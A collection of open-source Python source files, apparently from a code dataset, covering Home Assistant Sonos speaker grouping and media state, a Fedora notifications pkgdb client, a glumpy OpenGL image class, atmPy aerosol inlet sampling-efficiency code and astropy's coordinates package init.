"""Return the charging status of the speaker."""
if self.power_source:
return self.power_source != "BATTERY"
return None
async def async_poll_battery(self, now: datetime.datetime | None = None) -> None:
"""Poll the device for the current battery state."""
if not self.available:
return
if (
self._last_battery_event
and dt_util.utcnow() - self._last_battery_event < BATTERY_SCAN_INTERVAL
):
return
if battery_info := await self.hass.async_add_executor_job(
fetch_battery_info_or_none, self.soco
):
self.battery_info = battery_info
self.async_write_entity_states()
#
# Group management
#
def update_groups(self) -> None:
"""Update group topology when polling."""
self.hass.add_job(self.create_update_groups_coro())
def update_group_for_uid(self, uid: str) -> None:
"""Update group topology if uid is missing."""
if uid not in self._group_members_missing:
return
missing_zone = self.hass.data[DATA_SONOS].discovered[uid].zone_name
_LOGGER.debug(
"%s was missing, adding to %s group", missing_zone, self.zone_name
)
self.update_groups()
@callback
def async_update_groups(self, event: SonosEvent) -> None:
"""Handle callback for topology change event."""
if not hasattr(event, "zone_player_uui_ds_in_group"):
return
self.hass.async_create_task(self.create_update_groups_coro(event))
def create_update_groups_coro(self, event: SonosEvent | None = None) -> Coroutine:
"""Handle callback for topology change event."""
def _get_soco_group() -> list[str]:
"""Ask SoCo cache for existing topology."""
coordinator_uid = self.soco.uid
slave_uids = []
with contextlib.suppress(OSError, SoCoException):
if self.soco.group and self.soco.group.coordinator:
coordinator_uid = self.soco.group.coordinator.uid
slave_uids = [
p.uid
for p in self.soco.group.members
if p.uid != coordinator_uid and p.is_visible
]
return [coordinator_uid] + slave_uids
async def _async_extract_group(event: SonosEvent | None) -> list[str]:
"""Extract group layout from a topology event."""
group = event and event.zone_player_uui_ds_in_group
if group:
assert isinstance(group, str)
return group.split(",")
return await self.hass.async_add_executor_job(_get_soco_group)
@callback
def _async_regroup(group: list[str]) -> None:
"""Rebuild internal group layout."""
if (
group == [self.soco.uid]
and self.sonos_group == [self]
and self.sonos_group_entities
):
# Skip updating existing single speakers in polling mode
return
entity_registry = ent_reg.async_get(self.hass)
sonos_group = []
sonos_group_entities = []
for uid in group:
speaker = self.hass.data[DATA_SONOS].discovered.get(uid)
if speaker:
self._group_members_missing.discard(uid)
sonos_group.append(speaker)
entity_id = entity_registry.async_get_entity_id(
MP_DOMAIN, DOMAIN, uid
)
sonos_group_entities.append(entity_id)
else:
self._group_members_missing.add(uid)
_LOGGER.debug(
"%s group member unavailable (%s), will try again",
self.zone_name,
uid,
)
if self.sonos_group_entities == sonos_group_entities:
# Useful in polling mode for speakers with stereo pairs or surrounds
# as those "invisible" speakers will bypass the single speaker check
return
self.coordinator = None
self.sonos_group = sonos_group
self.sonos_group_entities = sonos_group_entities
self.async_write_entity_states()
for slave_uid in group[1:]:
slave = self.hass.data[DATA_SONOS].discovered.get(slave_uid)
if slave:
slave.coordinator = self
slave.sonos_group = sonos_group
slave.sonos_group_entities = sonos_group_entities
slave.async_write_entity_states()
_LOGGER.debug("Regrouped %s: %s", self.zone_name, self.sonos_group_entities)
async def _async_handle_group_event(event: SonosEvent | None) -> None:
"""Get async lock and handle event."""
async with self.hass.data[DATA_SONOS].topology_condition:
group = await _async_extract_group(event)
if self.soco.uid == group[0]:
_async_regroup(group)
self.hass.data[DATA_SONOS].topology_condition.notify_all()
return _async_handle_group_event(event)
@soco_error()
def join(self, slaves: list[SonosSpeaker]) -> list[SonosSpeaker]:
"""Form a group with other players."""
if self.coordinator:
self.unjoin()
group = [self]
else:
group = self.sonos_group.copy()
for slave in slaves:
if slave.soco.uid != self.soco.uid:
slave.soco.join(self.soco)
slave.coordinator = self
if slave not in group:
group.append(slave)
return group
@staticmethod
async def join_multi(
hass: HomeAssistant,
master: SonosSpeaker,
speakers: list[SonosSpeaker],
) -> None:
"""Form a group with other players."""
async with hass.data[DATA_SONOS].topology_condition:
group: list[SonosSpeaker] = await hass.async_add_executor_job(
master.join, speakers
)
await SonosSpeaker.wait_for_groups(hass, [group])
@soco_error()
def unjoin(self) -> None:
"""Unjoin the player from a group."""
self.soco.unjoin()
self.coordinator = None
@staticmethod
async def unjoin_multi(hass: HomeAssistant, speakers: list[SonosSpeaker]) -> None:
"""Unjoin several players from their group."""
def _unjoin_all(speakers: list[SonosSpeaker]) -> None:
"""Sync helper."""
# Unjoin slaves first to prevent inheritance of queues
coordinators = [s for s in speakers if s.is_coordinator]
slaves = [s for s in speakers if not s.is_coordinator]
for speaker in slaves + coordinators:
speaker.unjoin()
async with hass.data[DATA_SONOS].topology_condition:
await hass.async_add_executor_job(_unjoin_all, speakers)
await SonosSpeaker.wait_for_groups(hass, [[s] for s in speakers])
@soco_error()
def snapshot(self, with_group: bool) -> None:
"""Snapshot the state of a player."""
self.soco_snapshot = Snapshot(self.soco)
self.soco_snapshot.snapshot()
if with_group:
self.snapshot_group = self.sonos_group.copy()
else:
self.snapshot_group = None
@staticmethod
async def snapshot_multi(
hass: HomeAssistant, speakers: list[SonosSpeaker], with_group: bool
) -> None:
"""Snapshot all the speakers and optionally their groups."""
def _snapshot_all(speakers: list[SonosSpeaker]) -> None:
"""Sync helper."""
for speaker in speakers:
speaker.snapshot(with_group)
# Find all affected players
speakers_set = set(speakers)
if with_group:
for speaker in list(speakers_set):
speakers_set.update(speaker.sonos_group)
async with hass.data[DATA_SONOS].topology_condition:
await hass.async_add_executor_job(_snapshot_all, speakers_set)
@soco_error()
def restore(self) -> None:
"""Restore a snapshotted state to a player."""
try:
assert self.soco_snapshot is not None
self.soco_snapshot.restore()
except (TypeError, AssertionError, AttributeError, SoCoException) as ex:
# Can happen if restoring a coordinator onto a current slave
_LOGGER.warning("Error on restore %s: %s", self.zone_name, ex)
self.soco_snapshot = None
self.snapshot_group = None
@staticmethod
async def restore_multi(
hass: HomeAssistant, speakers: list[SonosSpeaker], with_group: bool
) -> None:
"""Restore snapshots for all the speakers."""
def _restore_groups(
speakers: set[SonosSpeaker], with_group: bool
) -> list[list[SonosSpeaker]]:
"""Pause all current coordinators and restore groups."""
for speaker in (s for s in speakers if s.is_coordinator):
if (
speaker.media.playback_status == SONOS_STATE_PLAYING
and "Pause" in speaker.soco.available_actions
):
try:
speaker.soco.pause()
except SoCoUPnPException as exc:
_LOGGER.debug(
"Pause failed during restore of %s: %s",
speaker.zone_name,
speaker.soco.available_actions,
exc_info=exc,
)
groups = []
if not with_group:
return groups
# Unjoin non-coordinator speakers not contained in the desired snapshot group
#
# If a coordinator is unjoined from its group, another speaker from the group
# will inherit the coordinator's playqueue and its own playqueue will be lost
speakers_to_unjoin = set()
for speaker in speakers:
if speaker.sonos_group == speaker.snapshot_group:
continue
speakers_to_unjoin.update(
{
s
for s in speaker.sonos_group[1:]
if s not in speaker.snapshot_group
}
)
for speaker in speakers_to_unjoin:
speaker.unjoin()
# Bring back the original group topology
for speaker in (s for s in speakers if s.snapshot_group):
assert speaker.snapshot_group is not None
if speaker.snapshot_group[0] == speaker:
if speaker.snapshot_group not in (speaker.sonos_group, [speaker]):
speaker.join(speaker.snapshot_group)
groups.append(speaker.snapshot_group.copy())
return groups
def _restore_players(speakers: list[SonosSpeaker]) -> None:
"""Restore state of all players."""
for speaker in (s for s in speakers if not s.is_coordinator):
speaker.restore()
for speaker in (s for s in speakers if s.is_coordinator):
speaker.restore()
# Find all affected players
speakers_set = {s for s in speakers if s.soco_snapshot}
if missing_snapshots := set(speakers) - speakers_set:
raise HomeAssistantError(
f"Restore failed, speakers are missing snapshots: {[s.zone_name for s in missing_snapshots]}"
)
if with_group:
for speaker in [s for s in speakers_set if s.snapshot_group]:
assert speaker.snapshot_group is not None
speakers_set.update(speaker.snapshot_group)
async with hass.data[DATA_SONOS].topology_condition:
groups = await hass.async_add_executor_job(
_restore_groups, speakers_set, with_group
)
await SonosSpeaker.wait_for_groups(hass, groups)
await hass.async_add_executor_job(_restore_players, speakers_set)
@staticmethod
async def wait_for_groups(
hass: HomeAssistant, groups: list[list[SonosSpeaker]]
) -> None:
"""Wait until all groups are present, or timeout."""
def _test_groups(groups: list[list[SonosSpeaker]]) -> bool:
"""Return whether all groups exist now."""
for group in groups:
coordinator = group[0]
# Test that coordinator is coordinating
current_group = coordinator.sonos_group
if coordinator != current_group[0]:
return False
# Test that slaves match
if set(group[1:]) != set(current_group[1:]):
return False
return True
try:
with async_timeout.timeout(5):
while not _test_groups(groups):
await hass.data[DATA_SONOS].topology_condition.wait()
except asyncio.TimeoutError:
_LOGGER.warning("Timeout waiting for target groups %s", groups)
for speaker in hass.data[DATA_SONOS].discovered.values():
speaker.soco._zgs_cache.clear() # pylint: disable=protected-access
#
# Media and playback state handlers
#
def update_volume(self) -> None:
"""Update information about current volume settings."""
self.volume = self.soco.volume
self.muted = self.soco.mute
self.night_mode = self.soco.night_mode
self.dialog_mode = self.soco.dialog_mode
self.bass_level = self.soco.bass
self.treble_level = self.soco.treble
try:
self.cross_fade = self.soco.cross_fade
except SoCoSlaveException:
pass
def update_media(self, event: SonosEvent | None = None) -> None:
"""Update information about currently playing media."""
variables = event and event.variables
if variables and "transport_state" in variables:
# If the transport has an error then transport_state will
# not be set
new_status = variables["transport_state"]
else:
transport_info = self.soco.get_current_transport_info()
new_status = transport_info["current_transport_state"]
# Ignore transitions, we should get the target state soon
if new_status == SONOS_STATE_TRANSITIONING:
return
self.media.clear()
update_position = new_status != self.media.playback_status
self.media.playback_status = new_status
if variables and "transport_state" in variables:
self.media.play_mode = variables["current_play_mode"]
track_uri = (
variables["enqueued_transport_uri"] or variables["current_track_uri"]
)
music_source = self.soco.music_source_from_uri(track_uri)
if uri_meta_data := variables.get("enqueued_transport_uri_meta_data"):
if isinstance(uri_meta_data, DidlPlaylistContainer):
self.media.playlist_name = uri_meta_data.title
else:
self.media.play_mode = self.soco.play_mode
music_source = self.soco.music_source
if music_source == MUSIC_SRC_TV:
self.update_media_linein(SOURCE_TV)
elif music_source == MUSIC_SRC_LINE_IN:
self.update_media_linein(SOURCE_LINEIN)
else:
track_info = self.soco.get_current_track_info()
if not track_info["uri"]:
self.media.clear_position()
else:
self.media.uri = track_info["uri"]
self.media.artist = track_info.get("artist")
self.media.album_name = track_info.get("album")
self.media.title = track_info.get("title")
if music_source == MUSIC_SRC_RADIO:
self.update_media_radio(variables)
else:
self.update_media_music(track_info)
self.update_media_position(update_position, track_info)
self.write_entity_states()
# Also update slaves
speakers = self.hass.data[DATA_SONOS].discovered.values()
for speaker in speakers:
if speaker.coordinator == self:
speaker.write_entity_states()
def update_media_linein(self, source: str) -> None:
"""Update state when playing from line-in/tv."""
self.media.clear_position()
self.media.title = source
self.media.source_name = source
def update_media_radio(self, variables: dict | None) -> None:
"""Update state when streaming radio."""
self.media.clear_position()
radio_title = None
if current_track_metadata := variables.get("current_track_meta_data"):
if album_art_uri := getattr(current_track_metadata, "album_art_uri", None):
self.media.image_url = self.media.library.build_album_art_full_uri(
album_art_uri
)
if not self.media.artist:
self.media.artist = getattr(current_track_metadata, "creator", None)
# A missing artist implies metadata is incomplete, try a different method
if not self.media.artist:
radio_show = None
stream_content = None
if current_track_metadata.radio_show:
radio_show = current_track_metadata.radio_show.split(",")[0]
if not current_track_metadata.stream_content.startswith(
("ZPSTR_", "TYPE=")
):
stream_content = current_track_metadata.stream_content
radio_title = " • ".join(filter(None, [radio_show, stream_content]))
if radio_title:
# Prefer the radio title created above
self.media.title = radio_title
elif uri_meta_data := variables.get("enqueued_transport_uri_meta_data"):
if isinstance(uri_meta_data, DidlAudioBroadcast) and (
self.soco.music_source_from_uri(self.media.title) == MUSIC_SRC_RADIO
or (
isinstance(self.media.title, str)
and isinstance(self.media.uri, str)
and (
self.media.title in self.media.uri
or self.media.title in urllib.parse.unquote(self.media.uri)
)
)
):
# Fall back to the radio channel name as a last resort
self.media.title = uri_meta_data.title
media_info = self.soco.get_current_media_info()
self.media.channel = media_info["channel"]
# Check if currently playing radio station is in favorites
fav = next(
(
fav
for fav in self.favorites
if fav.reference.get_uri() == media_info["uri"]
),
None,
)
if fav:
self.media.source_name = fav.title
def update_media_music(self, track_info: dict) -> None:
"""Update state when playing music tracks."""
self.media.image_url = track_info.get("album_art")
playlist_position = int(track_info.get("playlist_position")) # type: ignore
if playlist_position > 0:
self.media.queue_position = playlist_position - 1
def update_media_position(
self, update_media_position: bool, track_info: dict
) -> None:
"""Update state when playing music tracks."""
self.media.duration = _timespan_secs(track_info.get("duration"))
current_position = _timespan_secs(track_info.get("position"))
if self.media.duration == 0:
self.media.clear_position()
return
# player started reporting position?
if current_position is not None and self.media.position is None:
update_media_position = True
# position jumped?
if current_position is not None and self.media.position is not None:
if self.media.playback_status == SONOS_STATE_PLAYING:
assert self.media.position_updated_at is not None
time_delta = dt_util.utcnow() - self.media.position_updated_at
time_diff = time_delta.total_seconds()
else:
time_diff = 0
calculated_position = self.media.position + time_diff
if abs(calculated_position - current_position) > 1.5:
update_media_position = True
if current_position is None:
self.media.clear_position()
elif update_media_position:
self.media.position = current_position
self.media.position_updated_at = dt_util.utcnow()
| aronsky/home-assistant | homeassistant/components/sonos/speaker.py | Python | apache-2.0 | 43,630 |
""" Fedora Notifications pkgdb client """
import logging
import time
import requests
import requests.exceptions
import fedmsg.meta
from dogpile.cache import make_region
from fedora.client.fas2 import AccountSystem
log = logging.getLogger(__name__)
try:
import re2 as re
except ImportError:
log.warning("Couldn't import the 're2' module.")
import re
# We cache fancy stuff here from pkgdb, etc.. stuff that we want to expire.
_cache = make_region()
_FAS = None
# This doesn't need any expiration. Cache forever.
# We do this because the compilation step for python-re2 is 16x slower than
# stdlib, but the match is 10x faster. So, cache the slow part once and use
# the fast part at the tightest part of the loop.
_regex_cache = {}
def compile_regex(pattern):
if not pattern in _regex_cache:
# This is expensive with python-re2, so we cache it. Forever.
_regex_cache[pattern] = re.compile(pattern)
return _regex_cache[pattern]
def get_fas(config):
""" Return a fedora.client.fas2.AccountSystem object if the provided
configuration contains a FAS username and password.
"""
global _FAS
if _FAS is not None:
return _FAS
# In some development environments, having fas_credentials around is a
# pain.. so, let things proceed here, but emit a warning.
try:
creds = config['fas_credentials']
except KeyError:
log.warn("No fas_credentials available. Unable to query FAS.")
return None
default_url = 'https://admin.fedoraproject.org/accounts/'
_FAS = AccountSystem(
creds.get('base_url', default_url),
username=creds['username'],
password=creds['password'],
cache_session=False,
insecure=creds.get('insecure', False)
)
return _FAS
def get_packagers_of_package(config, package):
""" Retrieve the list of users who have commit on a package.
:arg config: a dict containing the fedmsg config
:arg package: the package you are interested in.
:return: a set listing all the fas usernames that have some ACL on package.
"""
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(get_packagers_of_package, package)
creator = lambda: _get_pkgdb2_packagers_for(config, package)
return _cache.get_or_create(key, creator)
def _get_pkgdb2_packagers_for(config, package):
log.debug("Requesting pkgdb2 packagers of package %r" % package)
default = 'https://admin.fedoraproject.org/pkgdb/api'
base = config.get('fmn.rules.utils.pkgdb_url', default)
url = '{0}/package/{1}'.format(base, package)
log.info("hitting url: %r" % url)
req = requests.get(url)
if not req.status_code == 200:
log.debug('URL %s returned code %s', req.url, req.status_code)
return set()
data = req.json()
if not data['packages'] or not 'acls' in data['packages'][0]:
return set()
obj = data['packages'][0]
packagers = set([
acl['fas_name'] for acl in obj['acls']
if acl['status'] == 'Approved'])
groups = set([
acl['fas_name'].replace('group::', '')
for acl in obj['acls'] if (
acl['status'] == 'Approved' and
acl['fas_name'].startswith('group::'))
])
if groups:
fas = get_fas(config)
for group in groups:
packagers.update(get_user_of_group(config, fas, group))
return packagers
def get_packages_of_user(config, username, flags):
""" Retrieve the list of packages where the specified user some acl.
:arg config: a dict containing the fedmsg config
:arg username: the fas username of the packager whose packages are of
interest.
:return: a set listing all the packages where the specified user has
some ACL.
"""
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
packages = []
groups = get_groups_of_user(config, get_fas(config), username)
owners = [username] + ['group::' + group for group in groups]
for owner in owners:
key = cache_key_generator(get_packages_of_user, owner)
creator = lambda: _get_pkgdb2_packages_for(config, owner, flags)
subset = _cache.get_or_create(key, creator)
packages.extend(subset)
return set(packages)
def cache_key_generator(fn, arg):
return "|".join([fn.__module__, fn.__name__, arg]).encode('utf-8')
def invalidate_cache_for(config, fn, arg):
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(fn, arg)
return _cache.delete(key)
def _get_pkgdb2_packages_for(config, username, flags):
log.debug("Requesting pkgdb2 packages for user %r" % username)
start = time.time()
default = 'https://admin.fedoraproject.org/pkgdb/api'
base = config.get('fmn.rules.utils.pkgdb_url', default)
url = '{0}/packager/package/{1}'.format(base, username)
log.info("hitting url: %r" % url)
req = requests.get(url)
if not req.status_code == 200:
log.debug('URL %s returned code %s', req.url, req.status_code)
return set()
data = req.json()
packages_of_interest = sum([data[flag] for flag in flags], [])
packages_of_interest = set([p['name'] for p in packages_of_interest])
log.debug("done talking with pkgdb2 for now. %0.2fs", time.time() - start)
return packages_of_interest
def get_user_of_group(config, fas, groupname):
''' Return the list of users in the specified group.
:arg config: a dict containing the fedmsg config
:arg fas: a fedora.client.fas2.AccountSystem object instanciated and loged
into FAS.
:arg groupname: the name of the group for which we want to retrieve the
members.
:return: a list of FAS user members of the specified group.
'''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(get_user_of_group, groupname)
def creator():
if not fas:
return set()
return set([u.username for u in fas.group_members(groupname)])
return _cache.get_or_create(key, creator)
def get_groups_of_user(config, fas, username):
''' Return the list of (pkgdb) groups to which the user belongs.
:arg config: a dict containing the fedmsg config
:arg fas: a fedora.client.fas2.AccountSystem object instanciated and loged
into FAS.
:arg username: the name of a user for which we want to retrieve groups
:return: a list of FAS groups to which the user belongs.
'''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(get_groups_of_user, username)
def creator():
if not fas:
return []
results = []
for group in fas.person_by_username(username).get('memberships', []):
if group['group_type'] == 'pkgdb':
results.append(group.name)
return results
return _cache.get_or_create(key, creator)
def msg2usernames(msg, **config):
''' Return cached fedmsg.meta.msg2usernames(...) '''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = "|".join(['usernames', msg['msg_id']]).encode('utf-8')
creator = lambda: fedmsg.meta.msg2usernames(msg, **config)
return _cache.get_or_create(key, creator)
def msg2packages(msg, **config):
''' Return cached fedmsg.meta.msg2packages(...) '''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = "|".join(['packages', msg['msg_id']]).encode('utf-8')
creator = lambda: fedmsg.meta.msg2packages(msg, **config)
return _cache.get_or_create(key, creator)
| jeremycline/fmn | fmn/rules/utils.py | Python | lgpl-2.1 | 7,808 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (C) 2009-2010 Nicolas P. Rougier
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import numpy as np
import OpenGL.GL as gl
import texture, shader, colormap, color
class Image(object):
''' '''
def __init__(self, Z, format=None, cmap=colormap.IceAndFire, vmin=None, vmax=None,
interpolation='nearest', origin='lower', lighted=False,
gridsize=(0.0,0.0,0.0), elevation = 0.0):
''' Creates a texture from numpy array.
Parameters:
-----------
Z : numpy array
Z may be a float32 or uint8 array with following shapes:
* M
* MxN
* MxNx[1,2,3,4]
format: [None | 'A' | 'LA' | 'RGB' | 'RGBA']
Specify the texture format to use. Most of times it is possible to
find it automatically but there are a few cases where it not
possible to decide. For example an array with shape (M,3) can be
considered as 2D alpha texture of size (M,3) or a 1D RGB texture of
size (M,).
interpolation: 'nearest', 'bilinear' or 'bicubic'
Interpolation method.
vmin: scalar
Minimal representable value.
vmax: scalar
Maximal representable value.
origin: 'lower' or 'upper'
Place the [0,0] index of the array in the upper left or lower left
corner.
'''
self._lut = None
self._interpolation = interpolation
self._lighted = lighted
self._gridsize = gridsize
self._elevation = elevation
self._texture = texture.Texture(Z)
self._origin = origin
self._vmin = vmin
self._vmax = vmax
self._data = Z
self.cmap = cmap # This takes care of actual build
self._shader = None
self.build()
def build(self):
''' Build shader '''
interpolation = self._interpolation
gridsize = self._gridsize
elevation = self._elevation
lighted = self._lighted
cmap = self._cmap
self._shader = None
# Source format is RGB or RGBA, no need of a colormap
if self._texture.src_format in [gl.GL_RGB,gl.GL_RGBA]:
if interpolation == 'bicubic':
self._shader = shader.Bicubic(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
elif interpolation == 'bilinear':
self._shader = shader.Bilinear(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
self._shader = None
# Source format is not RGB or RGBA
else:
if cmap:
if interpolation == 'bicubic':
self._shader = shader.Bicubic(True, lighted=lighted, gridsize=gridsize, elevation=elevation)
elif interpolation == 'bilinear':
self._shader = shader.Bilinear(True, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
self._shader = shader.Nearest(True, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
if interpolation == 'bicubic':
self._shader = shader.Bicubic(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
elif interpolation == 'bilinear':
self._shader = shader.Bilinear(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
self._shader = None
self.update()
@property
def shape(self):
''' Underlying array shape. '''
return self._data.shape
@property
def data(self):
''' Underlying array '''
return self._data
@property
def texture(self):
''' Underlying texture '''
return self._texture
@property
def shader(self):
''' Currently active shader '''
return self._shader
@property
def format(self):
''' Array representation format (string). '''
format = self._texture.src_format
if format == gl.GL_ALPHA:
return 'A'
elif format == gl.GL_LUMINANCE_ALPHA:
return 'LA'
elif format == gl.GL_RGB:
return 'RGB'
elif format == gl.GL_RGBA:
return 'RGBA'
def _get_cmap(self):
return self._cmap
def _set_cmap(self, cmap):
self._cmap = cmap
colors = self.cmap.LUT['rgb'][1:].flatten().view((np.float32,3))
self._lut = texture.Texture(colors)
cmap = property(_get_cmap, _set_cmap,
doc=''' Colormap to be used to represent the array. ''')
def _get_elevation(self):
return self._elevation
def _set_elevation(self, elevation):
# Do we need to re-build shader ?
if not (elevation*self._elevation):
self._elevation = elevation
self.build()
elif self._shader:
self._elevation = elevation
self._shader._elevation = elevation
elevation = property(_get_elevation, _set_elevation,
doc=''' Image elevation. ''')
def _get_origin(self):
return self._origin
def _set_origin(self, origin):
self._origin = origin
origin = property(_get_origin, _set_origin,
doc=''' Place the [0,0] index of the array in the upper
left or lower left corner. ''')
def _get_lighted(self):
return self._lighted
def _set_lighted(self, lighted):
self._lighted = lighted
self.build()
lighted = property(_get_lighted, _set_lighted,
doc=''' Indicate whether image is ligthed. ''')
def _get_interpolation(self):
return self._interpolation
def _set_interpolation(self, interpolation):
self._interpolation = interpolation
self.build()
interpolation = property(_get_interpolation, _set_interpolation,
doc=''' Interpolation method. ''')
def _get_vmin(self):
return self._vmin
def _set_vmin(self, vmin):
self._vmin = vmin
vmin = property(_get_vmin, _set_vmin,
doc=''' Minimal representable value. ''')
def _get_vmax(self):
return self._vmax
def _set_vmax(self, vmax):
self._vmax = vmax
vmax = property(_get_vmax, _set_vmax,
doc=''' Maximal representable value. ''')
def _get_gridsize(self):
return self._gridsize
def _get_gridsize_x(self):
return self._gridsize[0]
def _get_gridsize_y(self):
return self._gridsize[1]
def _get_gridsize_z(self):
return self._gridsize[2]
def _set_gridsize(self, gridsize):
# Do we need to re-build shader ?
x,y,z = gridsize
x,y,z = max(0,x),max(0,y),max(0,z)
_x,_y,_z = self._gridsize
self._gridsize = x,y,z
if not (x+y+z)*(_x+_y+_z) and (x+y+z)+(_x+_y+_z):
self.build()
elif self._shader:
self._shader._gridsize = x,y,z
def _set_gridsize_x(self, x):
self.gridsize = (max(0,x), self._gridsize[1], self._gridsize[2])
def _set_gridsize_y(self, y):
self.gridsize = (self._gridsize[0], max(0,y), self._gridsize[2])
def _set_gridsize_z(self, z):
self.gridsize = (self._gridsize[0], self._gridsize[1], max(0,z))
gridsize = property(_get_gridsize, _set_gridsize,
doc=''' Image grid (x,y,z). ''')
def update(self):
''' Data update. '''
if self.vmin is None:
vmin = self.data.min()
else:
vmin = self.vmin
if self.vmax is None:
vmax = self._data.max()
else:
vmax = self.vmax
if vmin == vmax:
vmin, vmax = 0, 1
if self._lut:
s = self._lut.width
self._texture.update(bias = 1.0/(s-1)-vmin*((s-3.1)/(s-1))/(vmax-vmin),
scale = ((s-3.1)/(s-1))/(vmax-vmin))
else:
self._texture.update(bias=-vmin/(vmax-vmin),scale=1.0/(vmax-vmin))
def blit(self, x, y, w, h):
''' Blit array onto active framebuffer. '''
if self._shader:
self._shader.bind(self.texture,self._lut)
if self.origin == 'lower':
t=0,1
else:
t=1,0
gl.glColor(1,1,1,1)
self._texture.blit(x,y,w,h,t=t)
if self._shader:
self._shader.unbind()
| davidcox/glumpy | glumpy/image.py | Python | bsd-3-clause | 8,858 |
import pandas as pd
# from atmPy.tools import thermodynamics
from atmPy.atmos import timeseries
import numpy as np
from atmPy.aerosols import sampling_efficiency as sampeff
from atmPy.tools import pandas_tools
_date_time_alts = ['uas_datetime']
_pressure_alt = ['StaticP', 'PRESS']
_temp_alt = ['AT_cont', 'AT']
_RH_alt = ['RH_cont', 'RH']
def read_csv(fname, temperature_limits=(-20, -0.5)):
"""
Arguments
---------
temerature_limits: tuple.
The temperature reading has false readings in it which can cause porblems later"""
df = pd.read_csv(fname, sep='\t')
pandas_tools.ensure_column_exists(df,'DateTime', _date_time_alts)
pandas_tools.ensure_column_exists(df,'Pressure_Pa', _pressure_alt)
pandas_tools.ensure_column_exists(df,'Temperature', _temp_alt)
pandas_tools.ensure_column_exists(df,'Relative_humidity', _RH_alt)
# return df
df.index = pd.Series(pd.to_datetime(df.DateTime, format='%Y-%m-%d %H:%M:%S'))
# df['Pressure_Pa'] = df.PRESS
# df['Temperature'] = df.AT
# df['Relative_humidity'] = df.RH
# df = df.drop('PRESS', axis=1)
# df = df.drop('AT', axis=1)
# df = df.drop('RH', axis=1)
df = df.drop('DateTime', axis=1)
df = df.sort_index()
if temperature_limits:
df = df[df.Temperature > temperature_limits[0]]
df = df[temperature_limits[1] > df.Temperature]
hk = timeseries.TimeSeries(df)
return hk
# class MantaPayload(timeseries.TimeSeries):
def sample_efficiency(particle_diameters = np.logspace(np.log10(0.14), np.log10(2.5),100),
manta_speed = 30, # m/s
pressure = 67., #kPa
main_inlet_diameter = 4.65 * 1e-3,
pick_off_diameter = 2.15 * 1e-3,
pick_off_flow_rate = 3,
lfe_diameter = 0.7 * 1e-3,
verbose = False):
"""Returns the manta sample efficiency for the POPS instrument (up most inlet)
Parameters
----------
particle_diameters: float or ndarray
Particle diameter in um.
manta_speed: float
speed of the aircraft in m/s.
pressure: flaot
Barometeric pressure in kPa.
main_inlet_diameter = 4.65 * 1e-3,
pick_off_diameter = 2.15 * 1e-3,
pick_off_flow_rate = 3,
lfe_diameter = 0.7 * 1e-3,
verbose = False
"""
main_inlet_bent = sampeff.loss_in_a_bent_section_of_circular_tubing(pressure = pressure, # kPa
particle_diameter = particle_diameters, # µm
tube_air_velocity = manta_speed, # m/s
tube_diameter = main_inlet_diameter, # m
angle_of_bend = 90, # degrees
flow_type = 'auto',
verbose = False)
t_pick_of = sampeff.loss_in_a_T_junction(particle_diameter=particle_diameters,
particle_velocity=30,
pick_of_tube_diameter=pick_off_diameter,
verbose=False)
laminar_flow_element = sampeff.loss_at_an_abrupt_contraction_in_circular_tubing(pressure=pressure, # kPa
particle_diameter=particle_diameters, # µm
tube_air_velocity=False, # m/s
flow_rate_in_inlet=pick_off_flow_rate, # cc/s
tube_diameter=pick_off_diameter, # m
contraction_diameter=lfe_diameter, # m
contraction_angle=90, # degrees
verbose=False,
)
bent_before_pops = sampeff.loss_in_a_bent_section_of_circular_tubing(
pressure = pressure, # kPa
particle_diameter = particle_diameters, # µm
tube_air_velocity = False, # m/s
tube_air_flow_rate = pick_off_flow_rate,
tube_diameter = pick_off_diameter, # m
angle_of_bend = 90, # degrees
flow_type = 'auto',
verbose = False)
gravitational_loss = sampeff.gravitational_loss_in_circular_tube(pressure=101.3, # kPa
particle_diameter=particle_diameters, # µm
tube_diameter=pick_off_diameter, # m
tube_length=0.25, # m
incline_angle=0, # degrees from horizontal (0-90)
flow_rate=3, # cc/s
mean_flow_velocity=False, # 0.1061 # m/s)
flow_type='auto',
verbose=False)
loss_list = [main_inlet_bent, t_pick_of, laminar_flow_element, bent_before_pops, gravitational_loss]
names = ['all_losses', 'main_inlet_bent', 't_pick_of', 'laminar_flow_element', 'bent_before_pops', 'gravitational_loss']
all_losses = 1
for l in loss_list:
all_losses *= l
loss_list.insert(0,all_losses)
df = pd.DataFrame(np.array(loss_list).transpose(), columns = names, index = particle_diameters*1e3)
df.index.name = 'diameters_nm'
return df | lo-co/atm-py | build/lib/atmPy/for_removal/Manta_payload/manta_payload.py | Python | mit | 6,200 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This subpackage contains classes and functions for celestial coordinates
of astronomical objects. It also contains a framework for conversions
between coordinate systems.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from .errors import *
from .angles import *
from .baseframe import *
from .frame_attributes import *
from .distances import *
from .earth import *
from .transformations import *
from .builtin_frames import *
from .name_resolve import *
from .matching import *
from .representation import *
from .sky_coordinate import *
from .funcs import *
from .calculation import *
from .solar_system import *
__doc__ += builtin_frames._transform_graph_docs + """
.. note::
The ecliptic coordinate systems (added in Astropy v1.1) have not been
extensively tested for accuracy or consistency with other implementations of
ecliptic coordinates. We welcome contributions to add such testing, but in
the meantime, users who depend on consistency with other implementations may
wish to check test inputs against good datasets before using Astropy's
ecliptic coordinates.
"""
| kelle/astropy | astropy/coordinates/__init__.py | Python | bsd-3-clause | 1,239 |
import os
import sys
